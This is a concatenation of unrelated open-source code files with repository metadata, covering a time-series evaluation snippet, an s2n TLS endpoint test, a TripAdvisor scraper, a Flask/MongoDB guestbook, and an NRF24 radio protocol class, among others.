return error
# repeat evaluation of a config
def repeat_evaluate(data, config, n_test, n_repeats=30):
# fit and evaluate the model n times
scores = [walk_forward_validation(data, n_test, config) for _ in range(n_repeats)]
return scores
# summarize model performance
def summarize_scores(name, scores):
# print a summary
scores_m, score_std = mean(scores), std(scores)
print('%s: %.3f RMSE (+/- %.3f)' % (name, scores_m, score_std))
# box and whisker plot
pyplot.boxplot(scores)
pyplot.show()
series = read_csv('monthly-car-sales.csv', header=0, index_col=0)
data = series.values
# data split
n_test = 12
# define config
config = [12, 24, 36]
# grid search
scores = repeat_evaluate(data, config, n_test)
# summarize scores
summarize_scores('persistence', scores)
| [
"noreply@github.com"
] | noreply@github.com |
4e2e2454f366b4ccf2365d6b99b0d14541f8eec0 | bd1da92cc915c6093ced6fe03f0bcd581906d3dd | /tests/integrationv2/test_well_known_endpoints.py | 2ff96377720d5ec10f6de008e91b8f182dad8957 | [
"MIT",
"Apache-2.0"
] | permissive | JRetza/s2n | f177c0534e751ad7f39f0c16cdc7a2a5849e3b40 | 0df8de3c5630357ed25b935a5978c63f49bb4108 | refs/heads/main | 2023-01-03T11:36:43.297765 | 2020-10-09T21:05:11 | 2020-10-09T21:05:11 | 303,068,948 | 1 | 0 | Apache-2.0 | 2020-10-11T07:47:24 | 2020-10-11T07:47:23 | null | UTF-8 | Python | false | false | 2,683 | py | import copy
import os
import pytest
from constants import TRUST_STORE_BUNDLE
from configuration import available_ports, PROTOCOLS
from common import ProviderOptions, Protocols, Ciphers
from fixtures import managed_process
from global_flags import get_flag, S2N_NO_PQ, S2N_FIPS_MODE
from providers import Provider, S2N
from utils import invalid_test_parameters, get_parameter_name
ENDPOINTS = [
{"endpoint": "amazon.com"},
{"endpoint": "facebook.com"},
{"endpoint": "google.com"},
{"endpoint": "netflix.com"},
{"endpoint": "s3.amazonaws.com"},
{"endpoint": "twitter.com"},
{"endpoint": "wikipedia.org"},
{"endpoint": "yahoo.com"},
]
if get_flag(S2N_NO_PQ, False) is False:
# If PQ was compiled into S2N, test the PQ preferences against KMS
pq_endpoints = [
{
"endpoint": "kms.us-east-1.amazonaws.com",
"cipher_preference_version": Ciphers.KMS_PQ_TLS_1_0_2019_06,
"expected_cipher": "ECDHE-BIKE-RSA-AES256-GCM-SHA384"
},
{
"endpoint": "kms.us-east-1.amazonaws.com",
"cipher_preference_version": Ciphers.PQ_SIKE_TEST_TLS_1_0_2019_11,
"expected_cipher": "ECDHE-SIKE-RSA-AES256-GCM-SHA384"
}
]
ENDPOINTS.extend(pq_endpoints)
# Wikipedia still fails when connecting from the codebuild images
expected_failures = [
'wikipedia.org'
]
@pytest.mark.uncollect_if(func=invalid_test_parameters)
@pytest.mark.parametrize("protocol", PROTOCOLS, ids=get_parameter_name)
@pytest.mark.parametrize("endpoint", ENDPOINTS, ids=lambda x: "{}-{}".format(x['endpoint'], x.get('cipher_preference_version', 'Default')))
def test_well_known_endpoints(managed_process, protocol, endpoint):
port = "443"
client_options = ProviderOptions(
mode=Provider.ClientMode,
host=endpoint['endpoint'],
port=port,
insecure=False,
client_trust_store=TRUST_STORE_BUNDLE,
protocol=protocol)
if get_flag(S2N_FIPS_MODE) is True:
client_options.client_trust_store = "../integration/trust-store/ca-bundle.trust.crt"
else:
client_options.client_trust_store = "../integration/trust-store/ca-bundle.crt"
if 'cipher_preference_version' in endpoint:
client_options.cipher = endpoint['cipher_preference_version']
client = managed_process(S2N, client_options, timeout=5)
for results in client.get_results():
if results.exception is not None or results.exit_code != 0:
assert endpoint['endpoint'] in expected_failures
if 'expected_cipher' in endpoint:
assert bytes(endpoint['expected_cipher'].encode('utf-8')) in results.stdout
| [
"noreply@github.com"
] | noreply@github.com |
8bbc7b4b428f5449c80ea5148865efc952e1484e | c10abab7156cd0d7fc2f55f66ab24066f42c0498 | /TrainSetGenerate/mv_correct_info.py | 7bf33cb56c7ff8b8a64ebd786c04c0a899a4c9c3 | [] | no_license | doubiiot/Text-Extraction-System-of-Business-Information-Pictures-in-Online-Stores | c0a14eaa6e0b7f72beb575c9abbb5455c43cd286 | 79c05d17ad012b8adce3769e7b78eacc65538ad1 | refs/heads/master | 2020-04-14T02:41:46.219746 | 2018-12-30T13:37:29 | 2018-12-30T13:37:29 | 163,589,307 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,528 | py | import pickle
import shutil
import os
def get_dic():
f = open('./label_name', 'r')
num = 0
dic = {}
for i in f.read()[0:-1]:
dic[num] = i
num = num + 1
return dic
def read_pickle():
f = open('./chinese_labels', 'rb')
dic = pickle.load(f)
print(dic)
def find_loc(tmp):
dic = get_dic()
for key, value in dic.items():
if(value == tmp):
#print(str(tmp + " folder is " + str(key)))
break
return key
if __name__ == "__main__":
#generate_pickle()
path = "/home/nansang/Desktop/correct2"
target_path = "/home/nansang/Desktop/workspace/train/dataset/train"
read_pickle()
for dirpath, dirnames, filenames in os.walk(path):
#print(dirnames)
for i in dirnames:
print(i)
loc = find_loc(i)
path_orignal = os.path.join(path,str(i))
path_files = os.path.join(target_path,str(loc).zfill(5))
for file_correct in os.listdir(path_orignal):
tmp_file = i + "/" + file_correct
src_file = os.path.join(path,tmp_file) #original file to move
dst_file = os.path.join(path_files,file_correct)
#print("src file is : " + str(src_file))
print("dst file is : " + str(dst_file))
#print("dst folder is : " + str(path_files))
if not os.path.exists(path_files):
os.makedirs(path_files)
shutil.copyfile(src_file,dst_file)
| [
"757282406@qq.com"
] | 757282406@qq.com |
944b07c373aec8167deeb8dc6bfdbe084937b546 | 50aaf7a32228fd29c53fbe59dda51253b308ebfb | /trading/model_runner_thread.py | bb7add2474e3d2bdc961d6bcf1ca438fc94fadbd | [] | no_license | xnsua/--pystock | 7300b35ecd9fad0e035ab58c91592739d94212cf | d1d414624b316b5fb01d02f99efa79a07eef5d53 | refs/heads/master | 2020-04-09T04:22:00.780773 | 2018-12-02T06:18:25 | 2018-12-02T06:18:36 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,298 | py | from common.alert import message_box_error
from project_config.logbook_logger import mylog
from trading.base_structure.trade_constants import MsgPushRealTimePrice, MsgQuitLoop, MsgBidOver
from trading.base_structure.trade_message import TradeMessage
from trading.models.abstract_model import AbstractModel
from trading.trade_context import TradeContext
class ModelRunnerThread:
def __init__(self, trade_context: TradeContext, model: AbstractModel):
assert not hasattr(trade_context.thread_local, 'name')
trade_context.thread_local.name = model.name()
self.trade_context = trade_context
self.model = model
self.self_queue = trade_context.current_thread_queue
self.model.init_model(trade_context)
def run_loop(self):
mylog.debug(f'Model: {self.model.name()} ........')
while True:
msg = self.self_queue.get() # type: TradeMessage
if isinstance(msg.operation, MsgBidOver):
self.model.on_bid_over()
elif isinstance(msg.operation, MsgPushRealTimePrice):
self.model.handle_bar()
elif isinstance(msg.operation, MsgQuitLoop):
return
else:
message_box_error('Unknown message operation: ', msg.operation)
| [
"cqhme@outlook.com"
] | cqhme@outlook.com |
288832b4e21767a5fe146fc0d0ad0218ce3730fc | be55991401aef504c42625c5201c8a9f14ca7c3b | /python全栈3期/面向对象/继承顺序.py | dcb0234f6de6831c86a781efdb3753c1b0f99ed8 | [
"Apache-2.0"
] | permissive | BillionsRichard/pycharmWorkspace | adc1f8bb15b58ded489fc8dec0df397601823d2c | 709e2681fc6d85ff52fb25717215a365f51073aa | refs/heads/master | 2021-09-14T21:12:59.839963 | 2021-08-08T09:05:37 | 2021-08-08T09:05:37 | 143,610,481 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 619 | py | """
广度优先: 新式类(Python3) F->D->B->E->C->A
深度优先: 经典类(python2,不继承自object类)F->D->B->A->E->C
A
| \
B C
| \
D E
\ /
\/
F
"""
from pprint import pprint as pp
class A:
def test(self):
print('A')
class B(A):
def test(self):
print('B')
pass
class C(A):
def test(self):
print('C')
class D(B):
pass
# def test(self):
# print('D')
class E(C):
def test(self):
print('E')
pass
class F(D, E):
pass
# def test(self):
# print('F')
f1 = F()
f1.test()
pp(F.__mro__)
| [
"295292802@qq.com"
] | 295292802@qq.com |
de407b057a3f07ac7af93c6c6aeb6aa4ef3eed6f | 9c224a0bd205b0140942c082dc68a10450638307 | /find_cms/cms_model.py | f47b4c8b7f57991f4a7075e76e68b2268aead399 | [] | no_license | Binye234/What_Cms_Auto_Poc | 195023be44c784ba44f92de7e344c5a56db152ae | 56cae28bfecfe3032efe6578c3f571e5de21a3e9 | refs/heads/master | 2022-06-06T16:16:19.366767 | 2020-05-04T07:04:34 | 2020-05-04T07:04:34 | 257,018,990 | 30 | 5 | null | null | null | null | UTF-8 | Python | false | false | 198 | py | # -*- coding: utf-8 -*-
class Cms_Model:
def __init__(self):
'''cms模型,记录各种参数'''
self.name = ""
self.url = ""
self.type=None
#self.flag
| [
"281564214@qq.com"
] | 281564214@qq.com |
77edf0789727527c8878b7240ecef57928ad998f | c5ea6a0b2d5f641b99414c3de87b60287feee3f8 | /ll_env/bin/django-admin.py | 10f7a05f30fae4202476fefdd5854038d5bac0c7 | [] | no_license | arif-hstu/django_blogsite | a78f303661d203080337c38d3e96a2ed295572be | 3ebd113600e6f6c3d65139268ea058364a4e0eac | refs/heads/main | 2023-03-09T04:23:55.468492 | 2021-02-16T19:19:02 | 2021-02-16T19:19:02 | 339,488,783 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 154 | py | #!/home/arif/django_practice/ll_env/bin/python3
from django.core import management
if __name__ == "__main__":
management.execute_from_command_line()
| [
"arif.dvm.hstu@gmail.com"
] | arif.dvm.hstu@gmail.com |
44793d5b5d5e8036980f789ec25d1f35af432398 | f649451bde3c1ceebe36fde242099618ec7dcf61 | /mojo-py/mojoland/recipes/gbm/eyestate_gbm_recipe.py | 7c3f2f7162bb366d2c6ef296412611c73d84dd62 | [] | no_license | h2oai/mojoland | aa1860881d1ee04ce57a3f4531a9a7022fb22a84 | aee15bcd7df195e0f1a3ed193aaad9728a7c43dd | refs/heads/master | 2023-08-25T08:46:26.343909 | 2022-09-01T16:14:23 | 2022-09-01T16:14:23 | 72,937,745 | 1 | 1 | null | 2021-11-10T16:00:03 | 2016-11-05T16:14:33 | Python | UTF-8 | Python | false | false | 643 | py | #!/usr/bin/env python3
# -*- encoding: utf-8 -*-
from typing import Iterator, List
from h2o.estimators import H2OGradientBoostingEstimator
from ..datasets import eyestate_frame, eyestate_data
from ..baserecipe import BaseRecipe
class EyestateGbmRecipe(BaseRecipe):
"""Binomial model, all features are numeric."""
def bake(self) -> H2OGradientBoostingEstimator:
fr = eyestate_frame()
model = H2OGradientBoostingEstimator(ntrees=100, distribution="bernoulli")
model.train(y="eyeDetection", training_frame=fr)
return model
def source(self) -> Iterator[List[str]]:
return eyestate_data()
| [
"pasha@h2o.ai"
] | pasha@h2o.ai |
f84d26d4e28de6fdda8bf0cdc36b0aa4ce4351a4 | 773d1efcbdb1bb1c4e0ade1cc1f0778a9d0aa99e | /tasks/AbramyanPartI/begin/begin23.py | 75bf082165fb19c20f8e05d6af8bda763936548a | [] | no_license | a-kikin/learningPython | f73ef5901b8ed85f1e6ddd9adc72723093acaf5d | c4e1a0541903f995ad86e095f99b646422753206 | refs/heads/master | 2020-04-01T20:12:31.522296 | 2018-11-13T08:10:23 | 2018-11-13T08:10:23 | 153,593,452 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 69 | py | a = 2
b = 4
c = 7
d = a
a = b
b = c
c = d
print(a, b, c)
| [
"a-kikin@yandex-team.ru"
] | a-kikin@yandex-team.ru |
d20ec4b9e3cdfff3d33a0db66cb8dd016d72d0b1 | d34a3cebc6d3153f6492d5c9cc1ed3d01bd507a2 | /Homework 2/models/icons.py | 66cf26e15bd4e3153b452f170d5b2eaae86fda2f | [
"LicenseRef-scancode-public-domain"
] | permissive | asilva3/CMPS183 | 9fde2e50ce4cd79af481ee33c1e1fa294bf2e60f | 5ae0d66fc30fcae3bdb9dfa018ec3b5746c5f4f2 | refs/heads/master | 2021-05-04T11:02:27.391152 | 2016-08-25T17:13:42 | 2016-08-25T17:13:42 | 45,205,556 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 118 | py | icon_shop = I(_class='fa fa-star')
icon_read = I(_class='fa fa-thumbs-up')
icon_noread = I(_class='fa fa-thumbs-down') | [
"asilva3@ucsc.edu"
] | asilva3@ucsc.edu |
2b82eda9ca0ac693fc27d54ea6d80342e9506926 | d1706d1054d0f497e549dbeb8108bdb4b71d6514 | /protocol.py | f7229a9c28991806417214ee8d4c1e1028dc5464 | [] | no_license | isaac-ped/cis800 | c35cf46360a15c6bafe9322bc87dc3c3c7a051ba | f45a1195928c8aa8d96be028d57a382fba4d9b26 | refs/heads/master | 2020-04-08T20:13:43.962684 | 2018-12-04T08:15:59 | 2018-12-04T08:15:59 | 159,689,806 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,169 | py | import ctypes as ct
class Udp(ct.Structure):
_fields_ = [("usrc", ct.c_ushort),
("udst", ct.c_ushort),
("ulen", ct.c_ushort),
("uchk", ct.c_ushort)]
class Eth(ct.Structure):
_fields_ = [("edst", ct.c_char * 6),
("esrc", ct.c_char * 6),
("eproto", ct.c_ushort)]
class Ip4(ct.Structure):
_fields_ = [("iverihn", ct.c_char),
("idscpecn", ct.c_char),
("ilen", ct.c_ushort),
("iid", ct.c_ushort),
("iflgfrag", ct.c_ushort),
("ittl", ct.c_char),
("iproto", ct.c_char),
("ichk", ct.c_ushort),
("isrc", ct.c_char * 4),
("idst", ct.c_char * 4)]
class Mcd(ct.Structure):
_fields_ = [("id", ct.c_ushort),
("seq", ct.c_ushort),
("tot", ct.c_ushort),
("zero", ct.c_ushort)]
class Hdr(ct.Structure):
_fields_ = Udp._fields_ + Eth._fields_ + Ip4._fields_ + Mcd._fields_
def as_hex(ptr, typ):
st = ct.string_at(ptr, ct.sizeof(typ))
return ":".join(c.encode('hex') for c in st)
| [
"iped@seas.upenn.edu"
] | iped@seas.upenn.edu |
f297dde3e24a29cede6a18efcb18439969ce8aba | 7e0e22e31aafc7eecda9d62ae4329f8697e23d40 | /scripts/average | 90f6be281641d653f9fe748d36aef7067a7f810b | [
"MIT"
] | permissive | Sandy4321/cli_stats | feec6e6b234e40062f0fe5b6519fdca0fc93f31b | d8a75cf81904a0565c9de6839ee4711355e26b70 | refs/heads/master | 2023-02-10T11:06:46.602325 | 2021-01-01T22:50:31 | 2021-01-01T22:50:31 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 476 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Compute the average of a number stream on stdin
Author: Gertjan van den Burg
License: See LICENSE file
Copyright (c) 2020, G.J.J. van den Burg
"""
import sys
def main():
total = 0.0
count = 0
for line in sys.stdin:
if not line.strip():
continue
total += float(line.strip())
count += 1
average = total / count
print(average)
if __name__ == "__main__":
main()
| [
"gertjanvandenburg@gmail.com"
] | gertjanvandenburg@gmail.com | |
feeba3de11c1896233c77e78c768f44cee7819c0 | b761d738cce8d1d6be860f0bd7250c21d25abcc6 | /urlread.py | e78a63fcfaeb89d07c8b6b50becf24a0a5523e02 | [] | no_license | leoninnovate/crawlers | 46c02f760aae19c9f52eabb070cfdaacca521aee | 6e4120165d3227cbdafaba530cc6cbb8bf5c09dd | refs/heads/master | 2021-01-20T16:45:21.685464 | 2014-06-11T15:47:30 | 2014-06-11T15:47:30 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,967 | py | import urllib, urllib.request
from bs4 import BeautifulSoup
from urllib.parse import urljoin
import time
list_a = []
##list_name = []
list_link = []
##list_rating = []
##list_imageurl = []
##list_review = []
##list_user_rating = []
##list_rank = []
list_det=[]
##t=time.process_time()
t=time.time()
##url = "http://www.tripadvisor.in/Hotels-g294217-Hong_Kong-Hotels.html"
url = input("Enter URL: ")
start = url
##p = urllib.request.urlopen(url)
check=0
while True:
try:
p = urllib.request.urlopen(url)
source = p.read()
p.close()
soup = BeautifulSoup(source)
r = soup.find_all('div', class_="orphan hotelsCount")[0].select('b')[0].string
## print(r)
## print(type(r))
check=int(r.replace(" ", ""))
## print(check)
break
except:
print("URL exception")
## print(o)
## o=o+1
continue
i=0
print(check)
while True:
## if(i==1):
## break
##
try:
p = urllib.request.urlopen(url)
except IOError:
print("URL exception")
continue
source = p.read()
p.close()
soup = BeautifulSoup(source)
a=soup.prettify()
x = a.split("var lazyImgs = [")[1].split("]")[0]
##for i in x:
## if i == ',':
## x.remove(i)
##print(x)
list_divs = soup.find_all("div", class_="listing wrap")
##print(list_divs[0].find_all('a', class_='property_title')[0].string)
##print(list_divs[0].find_all('a', class_='property_title')[0]['href'])
for item in list_divs:
b=item.find_all('a', class_='property_title')[0]['href']
if(b in list_link):
continue
dict_det = {}
a=item.find_all('a', class_='property_title')
if(a == []):
## list_name.append(None)
dict_det['Hotel name'] = None
else:
## list_name.append(a[0].string.replace("\n", ""))
dict_det['Hotel name'] = a[0].string.replace("\n", "")
if(b==None):
list_link.append(None)
dict_det['Details URL'] = None
else:
list_link.append( b)
dict_det['Details URL'] = urllib.parse.urljoin('http://www.tripadvisor.in/Hotels-g294217-Hong_Kong-Hotels.html', b)
c=item.find_all('img', class_='sprite-ratings-gry')
if(c==[]):
## list_rating.append(None)
dict_det['Star rating'] = None
else:
## list_rating.append(c[0]['alt'].replace("\n", ""))
dict_det['Star rating'] = c[0]['alt'].replace("\n", "")
d=item.find_all('img', class_='photo_image')
if(d==[]):
## list_imageurl.append(None)
dict_det['Image URL'] = None
else:
## list_imageurl.append(x.split(d[0]['id'])[1].split('"data":"')[1].split('"}')[0])
dict_det['Image URL'] = x.split(d[0]['id'])[1].split('"data":"')[1].split('"}')[0]
e=item.find_all('span', class_='more')
if(e == []):
## list_review.append(None)
dict_det['Number of reviews'] = None
else:
## list_review.append(e[0].find_all('a')[0].string.replace("\n", ""))
dict_det['Number of reviews'] = e[0].find_all('a')[0].string.replace("\n", "")
f=item.find_all('img', class_='sprite-ratings')
if(f==[]):
## list_user_rating.append(None)
dict_det['User rating'] = None
else:
## list_user_rating.append(f[0]['alt'].replace("\n", ""))
dict_det['User rating'] = f[0]['alt'].replace("\n", "")
g=item.find_all('div', class_='slim_ranking')
if(g == []):
## list_rank.append(None)
dict_det['Ranking'] = None
else:
## list_rank.append(g[0].string.replace("\n", ""))
dict_det['Ranking'] = g[0].string.replace("\n", "")
## print(dict_det)
list_det.append(dict_det)
if(int(len(list_det)) == int(check)):
## i=1
break
if(soup.find_all('span', class_='guiArw pageEndNext')!=[]):
n=start
print(len(list_name))
print("again")
else:
n=soup.find_all('a', class_='guiArw sprite-pageNext ')[0]['href']
## print(n)
url = urllib.parse.urljoin(url,n)
## print(url)
## p = urllib.request.urlopen(url)
##time = time.process_time() - t
time = time.time() - t
for i in range(len(list_det)):
print(list_det[i])
print("\n")
## print("Hotel name: ", list_name[i])
## print("Details Page URL: ", list_link[i])
## print("Star Rating: ",list_rating[i])
## print("Image URL: ",list_imageurl[i])
## print("Number of reviews: ",list_review[i])
## print("User Rating: ",list_user_rating[i])
## print("Rank of Hotel: ", list_rank[i])
## print('\n')
##print(type(len(list_name)))
##print("Hotel name: ", list_name)
##print(list_link)
##print("Star Ratings: ",list_rating)
##print("Image URLs: ",list_imageurl)
##print("Number of reviews: ",list_review)
##print("User Ratings: ",list_user_rating)
##print(list_rank)
##
##print(len(list_name))
##print(len(list_link))
##print(len(list_rating))
##print(len(list_imageurl))
##print(len(list_review))
##print(len(list_user_rating))
##print(len(list_rank))
print(len(list_det))
print(time)
##print(list_divs[2].find_all('img', class_='photo_image'))
"""
##print(list_divs[4].find_all('img', class_='sprite-ratings-gry'))
##list = soup.find_all('a', class_='property_title')
##print(list[0].string)
##a=list[0]['href']
##print(list[0]['href'])
##print(urllib.parse.urljoin('http://www.tripadvisor.in/Hotels-g294217-Hong_Kong-Hotels.html', a))
##i=0
##
##for item in list:
## list_name.append(list[i].string)
## list_link.append(urllib.parse.urljoin('http://www.tripadvisor.in/Hotels-g294217-Hong_Kong-Hotels.html', item['href']))
## try:
## if soup.find_all("img", class_="sprite-ratings-gry")[i]['alt']:
## print ('yes')
## else:
## print ('no')
## except Exception as e:
## print (e)
## list_rating.append(soup.find_all("img", class_="sprite-ratings-gry")[i]['alt'])
## i=i+1
##
##
##
##print(len(list_name))
##print(len(list_link))
##print(len(list_rating))
##rating = soup.find_all("img", class_="sprite-ratings-gry")
##for a in rating:
## list_rating.append(a['alt'])
##print(len(list_rating))
####print(rating)
##print(rating[0]['alt'])
#for item in s:
# list_a = item.find_all('a', class_='property_title')
# print(list_a)
##s = "<html><div>test</div><ul><li>1</li><li>2</li><li>3</li></ul></html>"
##
##soup = BeautifulSoup(s)
####print(soup.prettify())
##list = []
##i=1
##for child in (soup.ul.find_all()):
#### print(child.text)
## list.insert(int(child.text), i)
## i=i+1
"""
| [
"pranavchadha97@gmail.com"
] | pranavchadha97@gmail.com |
c1e242e1368825c4e5fb8b261aa43cb69ee38053 | c90ea430905d7e2129f86a639ddcecbbfcac1432 | /collector.py | 54dabfc9acda354b36104278c96955b5d940c1bd | [] | no_license | Hamedasd/ADM_HM3 | 8c2254ba1668edbbd3481bcaf652d48a89301d76 | 62c148fd48ee05420aa608098f123f07c311e41b | refs/heads/master | 2020-09-08T16:20:37.420017 | 2019-11-17T22:52:42 | 2019-11-17T22:52:42 | 221,182,142 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,252 | py | import csv , os, glob , random, time , codecs
import pandas as pd
import requests, urllib
from bs4 import BeautifulSoup
import time
import random
from collector_utils import WRITER
# here are the links to collect
# first we need to prepare all of the links in a list
url_1 = 'https://raw.githubusercontent.com/CriMenghini/ADM/master/2019/Homework_3/data/movies1.html'
url_2 = 'https://raw.githubusercontent.com/CriMenghini/ADM/master/2019/Homework_3/data/movies2.html'
url_3 = 'https://raw.githubusercontent.com/CriMenghini/ADM/master/2019/Homework_3/data/movies3.html'
# collect all of the urls in a list named url_list
# It's the collection of all urls
url_list = []
for url in [url_1 , url_2 , url_3]:
response = requests.get(url)
soup = BeautifulSoup(response.text, 'lxml')
for link in soup.find_all('a'):
url_list.append(link.get('href'))
for i ,link in enumerate(url_list):
try:
response = requests.get(link)
except requests.exceptions.RequestException as e:
E.append(e)
time.sleep(random.choice(range(1,4)))
response = requests.get(link)
soup = BeautifulSoup(response.text, 'html.parser')
WRITER(i , soup)
time.sleep(random.choice(range(1,4)))
| [
"noreply@github.com"
] | noreply@github.com |
fd940defda52fa51525d363b999c08ca8aed92f5 | 46076bec231e0e36c8bd90165b786371af0fe402 | /web/app.py | 2e005cc3bef68ffd1e9aec9f816be8c54eebb828 | [] | no_license | willgleich/mongogb | d0637819adbb3fd9f818890c1aa976766fc49238 | 46076055552c4b4f23b3f17c06140e5bdbd057ed | refs/heads/master | 2020-03-22T14:59:08.807516 | 2018-07-12T01:16:37 | 2018-07-12T01:16:37 | 140,220,144 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,085 | py | import pymongo
from flask import Flask, redirect, url_for, request, render_template, g, jsonify, flash, session
from flask_httpauth import HTTPBasicAuth
from werkzeug.security import generate_password_hash, check_password_hash
import os, datetime
import analytics
from io import BytesIO
import base64
import matplotlib
import urllib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
app = Flask(__name__)
auth = HTTPBasicAuth()
app.config['SECRET_KEY'] = os.urandom(24)
# dbconfig
client = pymongo.MongoClient(
os.environ['DB_PORT_27017_TCP_ADDR'],
27017)
db = client.guestbook
@app.route('/')
def index():
if session.get('logged_in'):
return render_template('index.html', user=session.get('username'))
return render_template('index.html')
@app.route('/login', methods=['GET', 'POST'])
def login():
if session.get('logged_in'):
return redirect(url_for('index'))
if request.method == 'POST':
if not ver_password(request.form['username'], request.form['password']):
return render_template('login.html', status='IncorrectPassword')
session['logged_in'] = True
session['username'] = request.form['username']
return redirect(url_for('create_post'))
return render_template('login.html')
@app.route('/logout', methods=['GET', 'POST'])
def logout():
session['logged_in'] = False
session['username'] = ''
return render_template('index.html')
@app.route('/register', methods=['GET', 'POST'])
def register():
if request.method == 'POST':
user_doc = {
'_id': request.form['username'],
'name': request.form['username'],
'password': generate_password_hash(request.form['password']),
'email': request.form['email']
}
try:
db.users.insert_one(user_doc)
except pymongo.errors.DuplicateKeyError:
status = '**ERROR** User with that name has already registered'
flash(status)
return render_template('register.html')
status = 'Registered Successfully'
flash(status)
session['logged_in'] = True
session['username'] = request.form['username']
return redirect(url_for('create_post'))
return render_template('register.html')
@app.route('/change_password', methods=['GET', 'POST'])
def change_password():
if request.method == 'POST':
if not ver_password(session['username'], request.form['currentPassword']):
return render_template('change_password.html', status='IncorrectPassword')
else:
db.users.update_one({"_id": session['username']},
{'$set': {"password": generate_password_hash(request.form['newPassword'])}})
flash('Password updated')
return render_template('change_password.html')
@app.route('/posts', methods=['GET'])
def posts():
_posts = db.posts.find()
posts = [item for item in _posts]
return render_template('posts.html', posts=reversed(posts))
@app.route('/create', methods=['GET', 'POST'])
def create_post():
if not session.get('logged_in'):
return render_template('unauthorized.html')
if request.method == 'POST':
post_doc = {
'author': session['username'],
'post': request.form['comment'],
'time': datetime.datetime.now()
}
db.posts.insert_one(post_doc)
return redirect(url_for('posts'))
return render_template('create_post.html')
@app.route('/analytics/top', methods=['GET'])
def top_analytics():
df_html = analytics.top_users_dataframe()
img = BytesIO()
df_graph = analytics.top_users_graph()
matplotlib.pyplot.savefig(img, format='png')
img.seek(0)
plot_url = urllib.parse.quote(base64.b64encode(img.read()).decode())
return render_template('analytics/top_analytics.html', top_users = df_html, plot_url=plot_url)
def ver_password(username, password):
user = db.users.find_one({'_id': username})
if not user or not check_password_hash(user['password'], password):
return False
return True
@app.route("/getip", methods=["GET"])
def get_my_ip():
return jsonify({'ip': request.remote_addr}), 200
def time_difference(then):
'''takes in a datetime object from a previous point in time
returns mins, seconds, hours, days, years ago
TODO: add in later minutes and clean up this code'''
delt = datetime.datetime.now() - then
if delt.seconds < 60:
return str(delt.seconds) + ' seconds ago'
elif delt.seconds < 60 * 60:
return str(delt.seconds // 60) + ' minutes ago'
elif delt.seconds < 60 * 60 * 24:
return str(delt.seconds // 3600) + ' hours ago'
elif delt.days < 365:
return str(delt.days) + ' days ago'
else:
return str(delt.days // 365) + ' years ago'
if __name__ == "__main__":
for i in range(25,0,-1):
analytics.populate_mongodb(minutes_ago=i)
app.jinja_env.globals.update(time_difference=time_difference)
app.run(host='0.0.0.0', debug=True)
| [
"wgleich@gmail.com"
] | wgleich@gmail.com |
6b5b168212ea389d9a1bf3925742513ee086a11a | 362305437647e60b76fcea2994ef365d0f880087 | /custom_components/aliu24/aliu0_protocol.py | 12a57c134ffee7ea2ed17d0a780877f7ba739be4 | [] | no_license | pys1024/homeassistant | 165e7d9ba5b799242f3da8a9d6090836e1e4f8e7 | 489ea0148bd01b2a6d8a029578fbd62997c7e7b2 | refs/heads/master | 2020-09-12T16:13:01.156437 | 2019-11-18T14:57:49 | 2019-11-18T14:57:49 | 222,475,329 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,206 | py | import RPi.GPIO as gpio
from nrf24 import NRF24
import time
class Aliu0_protocol:
'''自定义通信协议V1.0说明
通信协议结构:
通信指令(1字节)+操作数据(1字节)+设备编号(1字节)+发送方地址(5字节)+附加数据(24字节)
发送方地址能让接收方知道指令由谁发起,附加数据根据指令利用,一般不用
'''
# 主机与子机通信指令
DEVICE_STATE = 0XA6 #返回设备当前的状态,没有操作数据
DEVICE_TYPE = 0XAF #返回当前设备的类型,没有操作数据
SET_STATE = 0XB9 #设置设备的状态
LOCK_STATE = 0X86 #锁定设备的状态
REQUEST_STATE = 0X83 #请求设备的状态
REQUEST_TYPE = 0X3A #请求设备的类型
# 设备状态
DISCONNECTED = 0XF9 #represent device disconnected
STATE_ON = 0X03 #开启状态
STATE_OFF = 0X34 #关闭状态
STATE_0 = 0X73 #状态0
STATE_1 = 0X74 #状态1
STATE_2 = 0X75 #状态2
STATE_3 = 0X76 #状态3
STATE_4 = 0X77 #状态4
STATE_5 = 0X78 #状态5
# 设备种类
TYPE_SWITCH = 0XC3 #设备控制开关类型,开关两种状态
TYPE_SENSOR = 0XD8 #传感器类型,开关两种状态
TYPE_TEMP = 0X3D #温度传感器类型,返回温度数值
TYPE_TIME = 0X5B #计时器类型,返回时间信息
TYPE_LIGHT = 0X9F #光强传感器类型,返回光照强度
TYPE_DISTANCE = 0X1C #距离传感器类型,返回距离数值
# 其他
NOTHING = 0X64 #无
def __init__(self, bus, ce, irq, host_addr, slave_base):
"""Initialize"""
self._host_addr = host_addr
self._slave_addr = [0x00] + slave_base
self._tx_pack = [0]*32
self._tx_pack[0] = self.SET_STATE
self._tx_pack[1] = self.STATE_ON
self._tx_pack[3:8] = self._host_addr
self._rx_pack = [0]
self._radio = NRF24()
self._radio.begin(0, bus, ce, irq)
self._radio.setRetries(15,15)
self._radio.setPayloadSize(32)
self._radio.setChannel(0x40)
self._radio.setDataRate(NRF24.BR_2MBPS)
#radio.setPALevel(NRF24.PA_MAX)
#radio.setAutoAck(0)
#radio.setAutoAckPipe(0, True)
#radio.setAutoAckPipe(1, True)
#radio.setCRCLength(NRF24.CRC_16)
self._radio.openWritingPipe(self._slave_addr)
self._radio.openReadingPipe(1, self._host_addr)
#self._radio.startListening()
#self._radio.stopListening()
# radio.printDetails()
def _send_pack(self,retry):
count = 0
while count <= retry:
count += 1
sta = self._radio.write(self._tx_pack)
if sta == 1:
return True
return False
def set_on(self, addr, id):
self._tx_pack[0] = self.SET_STATE
self._tx_pack[1] = self.STATE_ON
self._tx_pack[2] = id
self._slave_addr[0] = addr
self._radio.openWritingPipe(self._slave_addr)
self._radio.stopListening()
